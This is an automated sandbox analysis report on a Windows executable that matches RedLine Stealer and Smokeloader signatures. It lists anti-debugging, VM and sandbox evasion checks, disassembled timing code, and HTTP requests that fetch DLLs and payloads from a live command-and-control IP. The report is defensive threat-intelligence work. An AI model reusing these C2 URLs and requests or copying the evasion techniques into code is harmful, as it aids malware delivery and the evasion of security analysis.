Windows Analysis Report
4kahanaK78.exe

Overview

General Information

Sample name: 4kahanaK78.exe (renamed because the original name is a hash value)
Original sample name: 3c2e26d10fa55af2e913120df3b7eddb.exe
Analysis ID: 1578915
MD5: 3c2e26d10fa55af2e913120df3b7eddb
SHA1: a6ba8c6378d44616d7196331c6ea54e286136ce6
SHA256: 4463effeb9799edfe6c07776f1e044718792fabb6ea103b9ee016e5efd21a985
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 4kahanaK78.exe (PID: 4128, cmdline: "C:\Users\user\Desktop\4kahanaK78.exe", MD5: 3C2E26D10FA55AF2E913120DF3B7EDDB)
    • WerFault.exe (PID: 5136, cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 1516, MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

No configs have been found

Yara matches (Source | Rule | Description | Author | Strings):
  • 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
    • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
  • 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: 4kahanaK78.exe | Avira: detected
Source: 4kahanaK78.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 4kahanaK78.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: 0_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: 0_2_04B43727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey
Source: 4kahanaK78.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\4kahanaK78.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: 0_2_00415D07 FindFirstFileExW
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: 0_2_10007EA9 FindFirstFileExW
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: 0_2_04B55F6E FindFirstFileExW
Source: Joe Sandbox View | IP Address: 185.156.73.23
Source: unknown | TCP traffic detected without corresponding DNS query: 185.156.73.23 (this entry is repeated 50 times in the report)
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar
Source: global traffic | HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 185.156.73.23 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dll/key HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 185.156.73.23 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dll/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 185.156.73.23 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /files/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: C | Host: 185.156.73.23 | Connection: Keep-Alive | Cache-Control: no-cache (this request is repeated 11 times in the report)
Source: global traffic | HTTP traffic detected: GET /soft/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: d | Host: 185.156.73.23 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /soft/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: s | Host: 185.156.73.23 | Connection: Keep-Alive | Cache-Control: no-cache
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/dll/download
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/dll/key
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/dll/key8
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/download
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/download23/add?substr=mixtwo&s=three&sub=emp
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/downloadhw
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/downloadpData
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/downloadpwT
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/downloadvwR
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/downloadw$
Source: 4kahanaK78.exe, 00000000.00000002.3309569416.000000000595C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/soft/download
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/soft/downloadL9
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/soft/downloadv9
Source: 4kahanaK78.exe, 00000000.00000002.3309317789.00000000055AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23H
Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net

System Summary

Source: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 4kahanaK78.exe | Static PE information: section name: (empty)
Source: 4kahanaK78.exe | Static PE information: section name: .idata
Source: 4kahanaK78.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\4kahanaK78.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: String function: 04B49E07 appears 35 times
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: String function: 04CE8FA0 appears 35 times
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: String function: 00409BA0 appears 35 times
Source: C:\Users\user\Desktop\4kahanaK78.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 1516
Source: 4kahanaK78.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c (reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12)
Source: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f (reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23)
Source: 4kahanaK78.exe | Static PE information: Section: bqzwvadu ZLIB complexity 0.9901198913843888
Source: classification engine | Classification label: mal100.evad.winEXE@2/10@0/1
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: 0_2_00D897C6 CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\Desktop\4kahanaK78.exe | Code function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar
Source: C:\Users\user\Desktop\4kahanaK78.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\add[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4128
Source: C:\Users\user\Desktop\4kahanaK78.exe | File created: C:\Users\user\AppData\Local\Temp\0e52GN0wDABsd
Source: C:\Users\user\Desktop\4kahanaK78.exe | Command line argument: emp (0_2_00408020)
Source: C:\Users\user\Desktop\4kahanaK78.exe | Command line argument: mixtwo (0_2_00408020)
Source: C:\Users\user\Desktop\4kahanaK78.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 4kahanaK78.exe | ReversingLabs: Detection: 60%
Source: 4kahanaK78.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown | Process created: C:\Users\user\Desktop\4kahanaK78.exe "C:\Users\user\Desktop\4kahanaK78.exe"
Source: C:\Users\user\Desktop\4kahanaK78.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 1516
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\4kahanaK78.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 4kahanaK78.exe | Static file information: File size 1933312 > 1048576
Source: C:\Users\user\Desktop\4kahanaK78.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 4kahanaK78.exe | Static PE information: Raw size of bqzwvadu is bigger than: 0x100000 < 0x1a8600

Data Obfuscation

Source: C:\Users\user\Desktop\4kahanaK78.exe | Unpacked PE file: 0.2.4kahanaK78.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bqzwvadu:EW;gbufcztg:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: 4kahanaK78.exe | Static PE information: real checksum: 0x1dfb8b should be: 0x1e63ab
Source: 4kahanaK78.exe | Static PE information: section name: (empty)
Source: 4kahanaK78.exe | Static PE information: section name: .idata
Source: 4kahanaK78.exe | Static PE information: section name: (empty)
Source: 4kahanaK78.exe | Static PE information: section name: bqzwvadu
Source: 4kahanaK78.exe | Static PE information: section name: gbufcztg
Source: 4kahanaK78.exe | Static PE information: section name: .taggant
Source: 4kahanaK78.exeStatic PE information: section name: bqzwvadu entropy: 7.948647238498833

Boot Survival

Source: C:\Users\user\Desktop\4kahanaK78.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\4kahanaK78.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\4kahanaK78.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\4kahanaK78.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\4kahanaK78.exe Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\4kahanaK78.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\4kahanaK78.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 81CFD7 second address: 81CFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 81CFDB second address: 81CFDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 81CFDF second address: 81CFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 81CFE5 second address: 81CFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 81CFFB second address: 81C8E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b ja 00007F0E05507503h 0x00000011 push dword ptr [ebp+122D16A9h] 0x00000017 jng 00007F0E05507502h 0x0000001d call dword ptr [ebp+122D18E1h] 0x00000023 pushad 0x00000024 ja 00007F0E05507510h 0x0000002a xor eax, eax 0x0000002c jmp 00007F0E05507509h 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 cmc 0x00000036 mov dword ptr [ebp+122D36EAh], eax 0x0000003c clc 0x0000003d mov esi, 0000003Ch 0x00000042 jmp 00007F0E05507509h 0x00000047 add esi, dword ptr [esp+24h] 0x0000004b pushad 0x0000004c jmp 00007F0E05507504h 0x00000051 sub ah, 0000007Bh 0x00000054 popad 0x00000055 jmp 00007F0E055074FFh 0x0000005a lodsw 0x0000005c sub dword ptr [ebp+122D1831h], ebx 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 mov dword ptr [ebp+122D1831h], ebx 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 sub dword ptr [ebp+122D1831h], ecx 0x00000076 nop 0x00000077 jo 00007F0E055074FEh 0x0000007d jng 00007F0E055074F8h 0x00000083 pushad 0x00000084 popad 0x00000085 push eax 0x00000086 pushad 0x00000087 jmp 00007F0E05507504h 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f popad 0x00000090 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 997AB1 second address: 997AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 997AB5 second address: 997ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0E055074FEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 997ACB second address: 997AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF6h 0x00000009 ja 00007F0E05506CE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 997AEB second address: 997AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996B1F second address: 996B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996B29 second address: 996B33 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E055074F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996B33 second address: 996B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996B39 second address: 996B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996B3F second address: 996B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996B43 second address: 996B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996DD0 second address: 996DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996DD6 second address: 996DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996DDA second address: 996DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996DDE second address: 996DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996DE4 second address: 996DED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996DED second address: 996DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996DF6 second address: 996DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 996F95 second address: 996FA5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E055074F6h 0x00000008 jc 00007F0E055074F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 9973AC second address: 9973B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999B61 second address: 999B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b add dword ptr [ebp+122D1B77h], ebx 0x00000011 push 00000000h 0x00000013 call 00007F0E055074FAh 0x00000018 mov ecx, esi 0x0000001a pop ecx 0x0000001b push C7C11652h 0x00000020 push ecx 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999C92 second address: 999CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F0E05506CF0h 0x0000000e mov dx, di 0x00000011 push 00000000h 0x00000013 movsx esi, ax 0x00000016 call 00007F0E05506CE9h 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999DB4 second address: 999DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999DB8 second address: 999DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999DBE second address: 999DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exe RDTSC instruction interceptor: First address: 999DC4 second address: 999E40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E05506CF7h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edi 0x00000017 jmp 00007F0E05506CEEh 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007F0E05506CF7h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push edi 0x00000029 pushad 0x0000002a jmp 00007F0E05506CEEh 0x0000002f push eax 0x00000030 pop eax 0x00000031 popad 0x00000032 pop edi 0x00000033 pop eax 0x00000034 mov dword ptr [ebp+122D19F2h], esi 0x0000003a lea ebx, dword ptr [ebp+12450A3Dh] 0x00000040 xchg eax, ebx 0x00000041 push ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
